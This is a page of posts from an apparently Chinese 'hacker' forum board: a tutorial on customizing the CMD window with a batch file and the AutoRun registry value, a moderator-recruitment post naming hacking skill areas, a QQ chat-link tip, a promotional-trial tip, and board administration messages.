教大家制作个性的DOS界面 首先在X盘(X为任意盘符)建立个文本文档,然后在里面写个批处理@echo offclsecho╔-------------------------------------------------╗echo┆ 别拿黑与白的对立 ┆echo┆ 衡量你与我的距离 ┆echo┆ By:阿呆 ┆echo╚-------------------------------------------------╝title 阿呆专用prompt 行动-》color 0d(这里我是写我自己的,你们可以任意修改成自己喜欢的,看你想象力了)然后保存为1.bat,这样,我们就在x盘目录下写了个批处理1.bat, 路径为x:\1.batOK 现在来给大家解释下.@echo off 加了这个以后,批处理中运行的程序将不被显示cls 这个是清屏的意思echo 是将输入的内容显示出来title 应该都明白吧,标题prompt 是改变命令符号的 color 是设置颜色的 当然,写了批处理,咱们还得让他实际的应用在DOS上呀,下面就得改注册表了.进入注册表应该会吧? 在开始---运行那里输入regedit 然后依次展开HKEY_LOCAL_MACHINE--SOFTWARE---Microsoft--Command Processor目录然后找到AutoRun这个值,右键单击选修改,然后在里面输入x:\1.bat(就是你批处理的路径)然后确定关闭,现在你打开CMD后看看.一个个性的CMD界面出来了... 希望大家能活学活用,毕竟批处理的用处十分的广~~~ By:阿呆
黑客吧内高手请进! 要求技术: 1.LAN组建:涉及到硬件(网线的制作,各客户机兼容配置==),路由,阔扑结构,交换机,集线器,基本故障处理. 2.系统:linux就不说了.了解windows:DOS,注册表,系统安装,优化.BIOS 3.程序语言:ASP,SQL,C,JAVE,C++,VB,ACCESS,JSP...(不要求精通,能大概了解,要求了解3门以上语言包括以上其中1门). 4.黑客技术:站点的入侵,提权, Sniff,端口漏洞,WINDOWS漏洞,批处理,免杀,溢出,代理(跳板),扫描. 说了那么多,该进正题了. 大家都知道,目前黑客吧已经不成样子了,广大网友都希望黑客吧能回复当日的雄风.但,要管理好黑客吧,就必须要有绝对的技术支持.最起码要回答得起人家的问题.吧里的流量是比较大的.问问题的人也是很多的.但计算机的问题是什么都有.吧主的能力是有限的,这就需要强大的技术支持.也许上面所涉及到的算不上什么高深的技术.但如果要全部了解或许没多少人能做到,最起码我不能~ >_<... 为了能解决广大网友提出的问题,也为了能更好的管理起帖吧,在此,黑客吧特邀请有技术的朋友加入管理组.只要能了解以上4门技术中的任意一门请留下您的QQ,但我要先声明: 1.你是真的希望黑客吧能像个黑客吧,肯帮这个忙的. 2.本次邀请的人没有任何的回报,回报您的,只有广大网友的:谢谢! 3 既然肯帮忙,就希望您能尽心尽力.为黑客吧出份力.如果你真的希望黑客吧能好起来,请支持吧!
为什么黑客吧内连接被删? 黑客吧里 这个帖里【黑客吧---黑色十字架】顷情联手,方便广大网友学习 的回帖中带有部分连接,但并没有病毒,为什么我发一次删一次? 请管理员给个说法??
和陌生QQ号聊天的三种有效方法(图) 我等菜鸟有许多时候需要在QQ上向高手请教问题,可对方不一定加自己为好友。我们可以用以下三种方法请他们和我们聊天: 第一种:生成网页法 首先打开“http://is.qq.com/cgi-bin/webpresence/wpa_code?uin=123456789”,把上面的123456789换成对方的QQ号。 然后选择想要的会话图片和提示。在“点击生成代码”中我们选择生成网页代码,这时我们可以得到一段网页代码,把它粘贴进入记事本中,这时再在这段代码的最前面加上,在最后面加上,然后保存为qq.html,然后双击打开点击上面“找我就Q我”的图标就可以和对方进行会话了。 如果想换一个QQ号的话,只用查找一下源代码,然后修改其中的QQ号,然后再点击保存就可以了。如图一所示:
免费紫钻 7天试用 活动网址:http://qqtang.qq.com/hero2006/gamevip.htm先报了名,填完有关的数据后,在按免费领取紫钻(注:把自动续费的√,改掉),然后继续,过几分钟后,紫钻就可以拿到手了,就算你不参加比赛,腾讯也拿你没办法. 有关比赛的大赛赛程,比赛规则,奖品设置,访问:http://qqtang.qq.com/hero2006/info_1.htm
调查大家来这里的需要 不知道大家来这里最需要的是什么?学习?寻帮助?还是帮助他人?还是需要得到什么? 请大家以更帖形式说出自己的需要,算是做个调查吧,毕竟要管理好一个吧就得“对症下药”。 谢谢大家支持~~~~~
【注意】吧内一切交易帖,请发此帖内! 黑客吧不是商业地方,希望大家不要随意的在此帖外发任何交易帖,一旦涉及到商业关系的,我们都将删除! 因此,希望大家如果真的需要在吧内做什么交易的话,请跟帖!希望大家能体谅吧主!
为什么封我黑客吧帐号 本人黑客吧刚上任吧主,不知道管理员为什么封我风〓阿呆这个帐号。请管理员能说明下!
为什么封我黑客吧帐号 本人黑客吧刚上任吧主,不知道管理员为什么封我风〓阿呆这个帐号。请管理员能说明下!
怎么人好少? 管理员呢?
靠,死海盗,进来!! 死海盗,黑吧的管理不做了。竟然跑到这里来。怀念你做管理的日子的呀。!! 有空找我聊天呀你还记得我么? 阿呆 262051149
1
下一页